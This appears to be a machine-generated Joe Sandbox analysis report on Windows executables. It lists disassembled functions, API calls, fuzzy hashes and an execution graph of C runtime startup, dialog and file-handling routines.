                                              APIs
                                              • IsWindowVisible.USER32(00010464), ref: 00CB4291
                                              • DialogBoxParamW.USER32(GETPASSWORD1,00010464,00CB0110,?), ref: 00CB42BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: DialogParamVisibleWindow
                                              • String ID: GETPASSWORD1
                                              • API String ID: 3157717868-3292211884
                                              • Opcode ID: b76e599620d2309e38a8fcfdf2a19e1fae09ca5e89893a3e00979997615ec236
                                              • Instruction ID: eeb45e9391c9de7bb4e60b2e086204d9f0778c2a17edf5d832ec336804017b26
                                              • Opcode Fuzzy Hash: b76e599620d2309e38a8fcfdf2a19e1fae09ca5e89893a3e00979997615ec236
                                              • Instruction Fuzzy Hash: C3012D30699794BFCF14AB65DC56FEF37C8AB02314F054125F811971A2CAB09844EB62
                                              Function 00C91E44 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00CA3EAA: _swprintf.LIBCMT ref: 00CA3EEA
                                                • Part of subcall function 00CA3EAA: _strlen.LIBCMT ref: 00CA3F0B
                                                • Part of subcall function 00CA3EAA: SetDlgItemTextW.USER32(?,00CD919C,?), ref: 00CA3F64
                                                • Part of subcall function 00CA3EAA: GetWindowRect.USER32(?,?), ref: 00CA3F9A
                                                • Part of subcall function 00CA3EAA: GetClientRect.USER32(?,?), ref: 00CA3FA6
                                              • GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                              • SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                              • String ID: 0
                                              • API String ID: 2622349952-4108050209
                                              • Opcode ID: 72020954498ebb5182985a07d79b94e8e2a1c1aa8f19c74e753516b3f61e45de
                                              • Instruction ID: 28911e3f7942b648453aeab4c5197e47ece530ab063f8ef07025b612a5d43af8
                                              • Opcode Fuzzy Hash: 72020954498ebb5182985a07d79b94e8e2a1c1aa8f19c74e753516b3f61e45de
                                              • Instruction Fuzzy Hash: CEF0A430A84389A6DF161F62DD0FBEE3B58AF05304F084255FD58582E1C774C750EB50
                                              Function 00CB536D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CB5379
                                                • Part of subcall function 00CB52FB: std::exception::exception.LIBCONCRT ref: 00CB5308
                                                • Part of subcall function 00CB734A: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00CB536C,?,00CD6C54,?), ref: 00CB73AA
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CB539F
                                                • Part of subcall function 00CB4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CB5041
                                                • Part of subcall function 00CB4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CB5052
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ExceptionRaise$AccessDloadHelper2@8LoadReleaseSectionWrite___delaystd::exception::exceptionstd::invalid_argument::invalid_argument
                                              • String ID: @Ut
                                              • API String ID: 1552410523-141846247
                                              • Opcode ID: a1c199c75cd9cc2fcea470032b210b05bf5e9260fca79da79942b80c9283d1e8
                                              • Instruction ID: 245ec5903c4772d367dc18ca1e4cc2edc8d1c726b3bd6c69705f3639375dc227
                                              • Opcode Fuzzy Hash: a1c199c75cd9cc2fcea470032b210b05bf5e9260fca79da79942b80c9283d1e8
                                              • Instruction Fuzzy Hash: B6D05BA991C20CBA9B04B6D1DC06DFD376CD940700F504527FA41D2592EAB0951455A1
                                              Function 00CA75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF,00CA770A,?,?,00CA777F,?,?,?,?,?,00CA7769), ref: 00CA75F3
                                              • GetLastError.KERNEL32(?,?,00CA777F,?,?,?,?,?,00CA7769), ref: 00CA75FF
                                                • Part of subcall function 00C992EB: __EH_prolog3_GS.LIBCMT ref: 00C992F2
                                              Strings
                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CA7608
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: ErrorH_prolog3_LastObjectSingleWait
                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                              • API String ID: 2419225763-2248577382
                                              • Opcode ID: ecbdedc9fa58de3772ecbbdd390195fad421860fa735958945616aeba671fa8a
                                              • Instruction ID: 8ab2eda5e870abfea7c86e52f3f9da48e2dff2242d63f7716239e24e2c194b14
                                              • Opcode Fuzzy Hash: ecbdedc9fa58de3772ecbbdd390195fad421860fa735958945616aeba671fa8a
                                              • Instruction Fuzzy Hash: CFD05E71908821B7DA1033A89C4EFAE7905DB12330F600728F639652E5DA20094292AD
                                              Function 00CA3E60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,9CAA5719), ref: 00CA3E65
                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00CA3E73
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: FindHandleModuleResource
                                              • String ID: RTL
                                              • API String ID: 3537982541-834975271
                                              • Opcode ID: e9596bf094e05c1ec3b03524c6b0ca8cfe7c06036999f95c1ea3837d3491d862
                                              • Instruction ID: 6c3f38054e38cb0532c9fbbbb7a00d1b7f2d442fe4ad8f7afcda8166d28f9154
                                              • Opcode Fuzzy Hash: e9596bf094e05c1ec3b03524c6b0ca8cfe7c06036999f95c1ea3837d3491d862
                                              • Instruction Fuzzy Hash: CCC0807174035096E7301771FC8DF472D585B05715F05045CF90D994C0D5E5D8418BD0

                                              Execution Graph

                                              Execution Coverage:3.5%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2.9%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:49
                                              execution_graph 96830 ea078b 96831 ea0797 __FrameHandler3::FrameUnwindToState 96830->96831 96860 ea0241 96831->96860 96833 ea079e 96834 ea08f1 96833->96834 96837 ea07c8 96833->96837 96901 ea0bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96834->96901 96836 ea08f8 96894 ea51e2 96836->96894 96840 ea0807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96837->96840 96871 eb280d 96837->96871 96847 ea0868 96840->96847 96897 ea51aa 38 API calls 3 library calls 96840->96897 96845 ea07e7 96879 ea0ce9 96847->96879 96849 ea086e 96883 e832a2 96849->96883 96854 ea088a 96854->96836 96855 ea088e 96854->96855 96856 ea0897 96855->96856 96899 ea5185 28 API calls _abort 96855->96899 96900 ea03d0 13 API calls 2 library calls 96856->96900 96859 ea089f 96859->96845 96861 ea024a 96860->96861 96903 ea0a28 IsProcessorFeaturePresent 96861->96903 96863 ea0256 96904 ea3024 10 API calls 3 library calls 96863->96904 96865 ea025b 96866 ea025f 96865->96866 96905 eb26a7 96865->96905 96866->96833 96869 ea0276 96869->96833 96872 eb2824 96871->96872 96873 ea0e1c _ValidateLocalCookies 5 API calls 96872->96873 96874 ea07e1 96873->96874 96874->96845 96875 eb27b1 96874->96875 96877 eb27e0 96875->96877 96876 ea0e1c _ValidateLocalCookies 5 API calls 96878 eb2809 96876->96878 96877->96876 96878->96840 96921 ea26d0 96879->96921 96881 ea0cfc GetStartupInfoW 96882 ea0d0f 96881->96882 96882->96849 96884 e832ae IsThemeActive 96883->96884 96886 e83309 96883->96886 96923 ea52d3 96884->96923 96898 ea0d22 GetModuleHandleW 96886->96898 96887 e832d9 96929 ea5339 96887->96929 96889 e832e0 96936 e8326d SystemParametersInfoW SystemParametersInfoW 96889->96936 96891 e832e7 96937 e83312 96891->96937 96893 e832ef SystemParametersInfoW 96893->96886 98161 ea4f5f 96894->98161 96897->96847 96898->96854 96899->96856 96900->96859 96901->96836 96903->96863 96904->96865 96909 ebd596 96905->96909 96908 ea304d 8 API calls 3 library calls 96908->96866 96910 ebd5af 96909->96910 96913 ea0e1c 96910->96913 96912 ea0268 96912->96869 96912->96908 96914 ea0e27 IsProcessorFeaturePresent 96913->96914 96915 ea0e25 96913->96915 96917 ea0fee 96914->96917 96915->96912 96920 ea0fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96917->96920 96919 ea10d1 96919->96912 96920->96919 96922 ea26e7 96921->96922 96922->96881 96922->96922 96924 ea52df __FrameHandler3::FrameUnwindToState 96923->96924 96986 eb32ee EnterCriticalSection 96924->96986 96926 ea52ea pre_c_initialization 96987 ea532a 96926->96987 96928 ea531f __wsopen_s 96928->96887 96930 ea535f 96929->96930 96931 ea5345 96929->96931 96930->96889 96931->96930 96991 eaf669 20 API calls _free 96931->96991 96933 ea534f 96992 eb2b7c 26 API calls __wsopen_s 96933->96992 96935 ea535a 96935->96889 96936->96891 96938 e83322 __wsopen_s 96937->96938 96993 e8bf07 96938->96993 96942 e83355 IsDebuggerPresent 96943 ec3c7d MessageBoxA 96942->96943 96944 e83363 96942->96944 96945 ec3c95 96943->96945 96944->96945 96946 e83377 96944->96946 97116 e840e0 96945->97116 97066 e83a1c 96946->97066 96953 e833e9 96955 ec3cc6 SetCurrentDirectoryW 96953->96955 96956 e833f1 96953->96956 96955->96956 96957 e833fc 96956->96957 97124 ee1ef3 AllocateAndInitializeSid CheckTokenMembership FreeSid 96956->97124 97110 e8345a 7 API calls 96957->97110 96961 ec3ce1 96961->96957 96963 ec3cf3 96961->96963 97125 e8551b 96963->97125 96964 e83406 96970 e8341b 96964->96970 97114 e838f2 60 API calls ___scrt_fastfail 96964->97114 96966 ec3cfc 97132 e8b25f 96966->97132 96969 ec3d0a 96972 ec3d39 96969->96972 96973 ec3d12 96969->96973 96971 e83436 96970->96971 97115 e8388e Shell_NotifyIconW ___scrt_fastfail 96970->97115 96977 e8343d SetCurrentDirectoryW 96971->96977 96976 e865a4 8 API calls 96972->96976 97138 e865a4 96973->97138 96979 ec3d35 GetForegroundWindow ShellExecuteW 96976->96979 96980 e83451 96977->96980 96983 ec3d6a 96979->96983 96980->96893 96983->96971 96986->96926 96990 eb3336 LeaveCriticalSection 96987->96990 96989 ea5331 96989->96928 96990->96989 96991->96933 96992->96935 97156 ea019b 96993->97156 96995 e8bf1c 97165 ea016b 96995->97165 96997 e8332e GetCurrentDirectoryW 96998 e84f60 96997->96998 96999 e8bf07 8 API calls 96998->96999 97000 e84f76 96999->97000 97180 e860f5 97000->97180 97002 e84f94 97194 e8bceb 97002->97194 97006 e84fb3 97204 e888e8 97006->97204 97009 e8b25f 8 API calls 97010 e84fcc 97009->97010 97207 e8bdc1 97010->97207 97012 e84fdc 97013 e8b25f 8 API calls 97012->97013 97014 e85002 97013->97014 97015 e8bdc1 39 API calls 97014->97015 97016 e85011 97015->97016 97017 e8bf07 8 API calls 97016->97017 97018 e8502f 97017->97018 97211 e85151 97018->97211 97022 e85049 97023 ec4afd 97022->97023 97024 e85053 97022->97024 97026 e85151 8 API calls 97023->97026 97025 ea4db8 _strftime 40 API calls 97024->97025 97027 e8505e 97025->97027 97028 ec4b11 97026->97028 97027->97028 97029 e85068 97027->97029 97031 e85151 8 API calls 97028->97031 97030 ea4db8 _strftime 40 API calls 97029->97030 97032 e85073 97030->97032 97033 ec4b2d 97031->97033 97032->97033 97034 e8507d 97032->97034 97035 e8551b 10 API calls 97033->97035 97036 ea4db8 _strftime 40 API calls 97034->97036 97037 ec4b50 97035->97037 97038 e85088 97036->97038 97039 e85151 8 API calls 97037->97039 97040 e85092 97038->97040 97041 ec4b79 97038->97041 97042 ec4b5c 97039->97042 97043 e850b5 97040->97043 97047 e8be6d 8 API calls 97040->97047 97044 e85151 8 API calls 97041->97044 97046 e8be6d 8 API calls 97042->97046 97045 ec4bb4 97043->97045 97227 e87d51 97043->97227 97048 ec4b97 97044->97048 97050 ec4b6a 97046->97050 97051 e850a8 97047->97051 97052 e8be6d 8 API calls 97048->97052 97054 e85151 8 API calls 97050->97054 97055 e85151 8 API calls 97051->97055 97056 ec4ba5 97052->97056 97054->97041 97055->97043 97057 e85151 8 API calls 97056->97057 97057->97045 97061 e888e8 8 API calls 97063 e850ee 97061->97063 97062 e88a10 8 API calls 97062->97063 97063->97061 97063->97062 97064 e85132 97063->97064 97065 e85151 8 API calls 97063->97065 97064->96942 97065->97063 97067 e83a29 __wsopen_s 97066->97067 97068 ec40b4 ___scrt_fastfail 97067->97068 97069 e83a42 97067->97069 97072 ec40d0 GetOpenFileNameW 97068->97072 97289 e8557e 97069->97289 97074 ec411f 97072->97074 97075 e884b7 8 API calls 97074->97075 97077 ec4134 97075->97077 97077->97077 98134 e835ab 7 API calls 97110->98134 97112 e83401 97113 e8353a CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97112->97113 97113->96964 97114->96970 97115->96971 97117 e840ee 97116->97117 97118 e84145 97116->97118 97120 ea016b 8 API calls 97117->97120 97121 e840ff 97117->97121 97119 ea016b 8 API calls 97118->97119 97119->97121 97120->97121 97122 e84154 8 API calls 97121->97122 97123 e84116 97122->97123 97123->96953 97124->96961 97126 ec22f0 __wsopen_s 97125->97126 97127 e85528 GetModuleFileNameW 97126->97127 97128 e8b25f 8 API calls 97127->97128 97129 e8554e 97128->97129 97130 e8557e 9 API calls 97129->97130 97131 e85558 97130->97131 97131->96966 97133 e8b26e _wcslen 97132->97133 97134 ea019b 8 API calls 97133->97134 97135 e8b296 __fread_nolock 97134->97135 97136 ea016b 8 API calls 97135->97136 97137 e8b2ac 97136->97137 97137->96969 97139 e865bb 97138->97139 97140 ec5629 97138->97140 98135 e865cc 97139->98135 97142 ea016b 8 API calls 97140->97142 97144 ec5633 _wcslen 97142->97144 97145 ea019b 8 API calls 97144->97145 97157 ea016b ___std_exception_copy 97156->97157 97158 ea018a 97157->97158 97161 ea018c 97157->97161 97174 ea523d 7 API calls 2 library calls 97157->97174 97158->96995 97160 ea09fd 97176 ea3634 RaiseException 97160->97176 97161->97160 97175 ea3634 RaiseException 97161->97175 97164 ea0a1a 97164->96995 97167 ea0170 ___std_exception_copy 97165->97167 97166 ea018a 97166->96997 97167->97166 97170 ea018c 97167->97170 97177 ea523d 7 API calls 2 library calls 97167->97177 97169 ea09fd 97179 ea3634 RaiseException 97169->97179 97170->97169 97178 ea3634 RaiseException 97170->97178 97173 ea0a1a 97173->96997 97174->97157 97175->97160 97176->97164 97177->97167 97178->97169 97179->97173 97181 e86102 __wsopen_s 97180->97181 97182 e884b7 8 API calls 97181->97182 97183 e86134 97181->97183 97182->97183 97193 e8616a 97183->97193 97249 e8627c 97183->97249 97185 e8627c 8 API calls 97185->97193 97186 e8b25f 8 API calls 97188 e86261 97186->97188 97187 e8b25f 8 API calls 97187->97193 97189 e8684e 8 API calls 97188->97189 97190 e8626d 97189->97190 97190->97002 97192 e86238 97192->97186 97192->97190 97193->97185 97193->97187 97193->97192 97252 e8684e 97193->97252 97195 e84fa8 97194->97195 97196 e8bd05 97194->97196 97200 e8be6d 97195->97200 97197 ea016b 8 API calls 97196->97197 97198 e8bd0f 97197->97198 97199 ea019b 8 API calls 97198->97199 97199->97195 97201 e8be81 97200->97201 97203 e8be90 __fread_nolock 97200->97203 97202 ea019b 8 API calls 97201->97202 97201->97203 97202->97203 97203->97006 97205 ea016b 8 API calls 97204->97205 97206 e84fbf 97205->97206 97206->97009 97208 e8bdcc 97207->97208 97209 e8bdfb 97208->97209 97264 e8bf39 39 API calls 97208->97264 97209->97012 97212 e85179 97211->97212 97213 e8515b 97211->97213 97214 e884b7 8 API calls 97212->97214 97215 e8be6d 8 API calls 97213->97215 97216 e8503b 97213->97216 97214->97216 97215->97216 97217 ea4db8 97216->97217 97218 ea4e3b 97217->97218 97219 ea4dc6 97217->97219 97267 ea4e4d 40 API calls 4 library calls 97218->97267 97226 ea4deb 97219->97226 97265 eaf669 20 API calls _free 97219->97265 97222 ea4e48 97222->97022 97223 ea4dd2 97266 eb2b7c 26 API calls __wsopen_s 97223->97266 97225 ea4ddd 97225->97022 97226->97022 97228 e87d59 97227->97228 97229 ea016b 8 API calls 97228->97229 97230 e87d67 97229->97230 97268 e88386 97230->97268 97233 e883b0 97271 e8c700 97233->97271 97235 e883c0 97236 ea019b 8 API calls 97235->97236 97237 e850d3 97235->97237 97236->97237 97238 e88a10 97237->97238 97239 e88a26 97238->97239 97240 ec6728 97239->97240 97241 e88a30 97239->97241 97284 e9b71c 8 API calls 97240->97284 97242 ec6735 97241->97242 97246 e88b44 97241->97246 97248 e88b4b 97241->97248 97285 e8b3fe 97242->97285 97245 ec6753 97245->97245 97247 ea016b 8 API calls 97246->97247 97247->97248 97248->97063 97258 e8c269 97249->97258 97251 e86287 97251->97183 97253 e8685d 97252->97253 97257 e8687e __fread_nolock 97252->97257 97255 ea019b 8 API calls 97253->97255 97254 ea016b 8 API calls 97256 e86891 97254->97256 97255->97257 97256->97193 97257->97254 97259 e8c27c 97258->97259 97263 e8c279 __fread_nolock 97258->97263 97260 ea016b 8 API calls 97259->97260 97261 e8c287 97260->97261 97262 ea019b 8 API calls 97261->97262 97262->97263 97263->97251 97264->97209 97265->97223 97266->97225 97267->97222 97269 ea016b 8 API calls 97268->97269 97270 e850c5 97269->97270 97270->97233 97272 e8c70b 97271->97272 97273 ed1228 97272->97273 97277 e8c713 ISource 97272->97277 97274 ea016b 8 API calls 97273->97274 97276 ed1234 97274->97276 97275 e8c71a 97275->97235 97277->97275 97279 e8c780 97277->97279 97280 e8c78b ISource 97279->97280 97282 e8c7c6 ISource 97280->97282 97283 e9e29c 8 API calls ISource 97280->97283 97282->97277 97283->97282 97284->97242 97286 e8b412 97285->97286 97287 e8b40c 97285->97287 97286->97245 97287->97286 97288 e8be6d 8 API calls 97287->97288 97288->97286 97346 ec22f0 97289->97346 97292 e855aa 97294 e884b7 8 API calls 97292->97294 97293 e855c5 97295 e8bceb 8 API calls 97293->97295 97296 e855b6 97294->97296 97295->97296 97348 e879ed 97296->97348 97299 e839de 97300 ec22f0 __wsopen_s 97299->97300 97301 e839eb GetLongPathNameW 97300->97301 97302 e884b7 8 API calls 97301->97302 97303 e83a13 97302->97303 97304 e85379 97303->97304 97305 e8bf07 8 API calls 97304->97305 97306 e8538b 97305->97306 97307 e8557e 9 API calls 97306->97307 97308 e85396 97307->97308 97309 ec4d35 97308->97309 97310 e853a1 97308->97310 97315 ec4d57 97309->97315 97362 e9e2e5 97309->97362 97311 e8684e 8 API calls 97310->97311 97313 e853ad 97311->97313 97356 e81340 97313->97356 97347 e8558b GetFullPathNameW 97346->97347 97347->97292 97347->97293 97349 e879fb 97348->97349 97352 e896d9 97349->97352 97351 e83a4b 97351->97299 97353 e896f0 __fread_nolock 97352->97353 97354 e896e7 97352->97354 97353->97351 97353->97353 97354->97353 97355 e8c269 8 API calls 97354->97355 97355->97353 97357 e81352 97356->97357 97361 e81371 __fread_nolock 97356->97361 97360 ea019b 8 API calls 97357->97360 97358 ea016b 8 API calls 97359 e81388 97358->97359 97360->97361 97361->97358 97363 e9e2f4 CompareStringW 97362->97363 97364 ede463 97362->97364 97366 e9e319 97363->97366 97364->97366 97367 eae24b 40 API calls 97364->97367 97366->97309 97367->97364 98134->97112 98136 e865dc _wcslen 98135->98136 98137 ec568b 98136->98137 98138 e865ef 98136->98138 98162 ea4f6b IsInExceptionSpec 98161->98162 98163 ea4f72 98162->98163 98164 ea4f84 98162->98164 98200 ea50b9 GetModuleHandleW 98163->98200 98185 eb32ee EnterCriticalSection 98164->98185 98167 ea4f77 98167->98164 98201 ea50fd GetModuleHandleExW 98167->98201 98168 ea5029 98189 ea5069 98168->98189 98172 ea4f8b 98172->98168 98174 ea5000 98172->98174 98186 eb2538 98172->98186 98175 ea5018 98174->98175 98180 eb27b1 _abort 5 API calls 98174->98180 98181 eb27b1 _abort 5 API calls 98175->98181 98176 ea5072 98209 ec20c9 5 API calls _ValidateLocalCookies 98176->98209 98177 ea5046 98192 ea5078 98177->98192 98180->98175 98181->98168 98185->98172 98210 eb2271 98186->98210 98229 eb3336 LeaveCriticalSection 98189->98229 98191 ea5042 98191->98176 98191->98177 98230 eb399c 98192->98230 98195 ea50a6 98198 ea50fd _abort 8 API calls 98195->98198 98196 ea5086 GetPEB 98196->98195 98197 ea5096 GetCurrentProcess TerminateProcess 98196->98197 98197->98195 98199 ea50ae ExitProcess 98198->98199 98200->98167 98202 ea514a 98201->98202 98203 ea5127 GetProcAddress 98201->98203 98204 ea5159 98202->98204 98205 ea5150 FreeLibrary 98202->98205 98207 ea513c 98203->98207 98206 ea0e1c _ValidateLocalCookies 5 API calls 98204->98206 98205->98204 98208 ea4f83 98206->98208 98207->98202 98208->98164 98213 eb2220 98210->98213 98212 eb2295 98212->98174 98214 eb222c __FrameHandler3::FrameUnwindToState 98213->98214 98221 eb32ee EnterCriticalSection 98214->98221 98216 eb223a 98222 eb22c1 98216->98222 98220 eb2258 __wsopen_s 98220->98212 98221->98216 98223 eb22e1 98222->98223 98226 eb22e9 98222->98226 98224 ea0e1c _ValidateLocalCookies 5 API calls 98223->98224 98225 eb2247 98224->98225 98228 eb2265 LeaveCriticalSection _abort 98225->98228 98226->98223 98227 eb2d58 _free 20 API calls 98226->98227 98227->98223 98228->98220 98229->98191 98231 eb39c1 98230->98231 98232 eb39b7 98230->98232 98237 eb3367 5 API calls 2 library calls 98231->98237 98234 ea0e1c _ValidateLocalCookies 5 API calls 98232->98234 98235 ea5082 98234->98235 98235->98195 98235->98196 98236 eb39d8 98236->98232 98237->98236 98238 eb3188 GetLastError 98239 eb31a7 98238->98239 98240 eb31a1 98238->98240 98242 eb500d _free 17 API calls 98239->98242 98244 eb31fe SetLastError 98239->98244 98257 eb359e 11 API calls 2 library calls 98240->98257 98243 eb31b9 98242->98243 98245 eb31c1 98243->98245 98258 eb35f4 11 API calls 2 library calls 98243->98258 98246 eb3207 98244->98246 98248 eb2d58 _free 17 API calls 98245->98248 98251 eb31c7 98248->98251 98249 eb31d6 98249->98245 98250 eb31dd 98249->98250 98259 eb2f76 20 API calls _free 98250->98259 98253 eb31f5 SetLastError 98251->98253 98253->98246 98254 eb31e8 98255 eb2d58 _free 17 API calls 98254->98255 98256 eb31ee 98255->98256 98256->98244 98256->98253 98257->98239 98258->98249 98259->98254 98260 eaf08e 98261 eaf09a __FrameHandler3::FrameUnwindToState 98260->98261 98262 eaf0bb 98261->98262 98263 eaf0a6 98261->98263 98273 ea951d EnterCriticalSection 98262->98273 98279 eaf669 20 API calls _free 98263->98279 98266 eaf0ab 98280 eb2b7c 26 API calls __wsopen_s 98266->98280 98267 eaf0c7 98274 eaf0fb 98267->98274 98272 eaf0b6 __wsopen_s 98273->98267 98282 eaf126 98274->98282 98276 eaf108 98277 eaf0d4 98276->98277 98302 eaf669 20 API calls _free 98276->98302 98281 eaf0f1 LeaveCriticalSection __fread_nolock 98277->98281 98279->98266 98280->98272 98281->98272 98283 eaf14e 98282->98283 98284 eaf134 98282->98284 98286 eadce5 __fread_nolock 26 API calls 98283->98286 98306 eaf669 20 API calls _free 98284->98306 98288 eaf157 98286->98288 98287 eaf139 98307 eb2b7c 26 API calls __wsopen_s 98287->98307 98303 eb9799 98288->98303 98292 eaf25b 98294 eaf268 98292->98294 98299 eaf20e 98292->98299 98293 eaf1df 98295 eaf1fc 98293->98295 98293->98299 98309 eaf669 20 API calls _free 98294->98309 98308 eaf43f 31 API calls 4 library calls 98295->98308 98298 eaf206 98301 eaf144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 98298->98301 98299->98301 98310 eaf2bb 30 API calls 2 library calls 98299->98310 98301->98276 98302->98277 98311 eb9616 98303->98311 98305 eaf173 98305->98292 98305->98293 98305->98301 98306->98287 98307->98301 98308->98298 98309->98301 98310->98301 98312 eb9622 __FrameHandler3::FrameUnwindToState 98311->98312 98313 eb962a 98312->98313 98314 eb9642 98312->98314 98346 eaf656 20 API calls _free 98313->98346 98316 eb96f6 98314->98316 98320 eb967a 98314->98320 98351 eaf656 20 API calls _free 98316->98351 98317 eb962f 98347 eaf669 20 API calls _free 98317->98347 98336 eb54d7 EnterCriticalSection 98320->98336 98321 eb96fb 98352 eaf669 20 API calls _free 98321->98352 98324 eb9680 98326 eb96b9 98324->98326 98327 eb96a4 98324->98327 98325 eb9703 98353 eb2b7c 26 API calls __wsopen_s 98325->98353 98337 eb971b 98326->98337 98348 eaf669 20 API calls _free 98327->98348 98329 eb9637 __wsopen_s 98329->98305 98332 eb96a9 98349 eaf656 20 API calls _free 98332->98349 98333 eb96b4 98350 eb96ee LeaveCriticalSection __wsopen_s 98333->98350 98336->98324 98354 eb5754 98337->98354 98339 eb972d 98340 eb9746 SetFilePointerEx 98339->98340 98341 eb9735 98339->98341 98342 eb975e GetLastError 98340->98342 98345 eb973a 98340->98345 98367 eaf669 20 API calls _free 98341->98367 98368 eaf633 20 API calls 2 library calls 98342->98368 98345->98333 98346->98317 98347->98329 98348->98332 98349->98333 98350->98329 98351->98321 98352->98325 98353->98329 98355 eb5761 98354->98355 98357 eb5776 98354->98357 98369 eaf656 20 API calls _free 98355->98369 98360 eb579b 98357->98360 98371 eaf656 20 API calls _free 98357->98371 98359 eb5766 98370 eaf669 20 API calls _free 98359->98370 98360->98339 98361 eb57a6 98372 eaf669 20 API calls _free 98361->98372 98364 eb576e 98364->98339 98365 eb57ae 98373 eb2b7c 26 API calls __wsopen_s 98365->98373 98367->98345 98368->98345 98369->98359 98370->98364 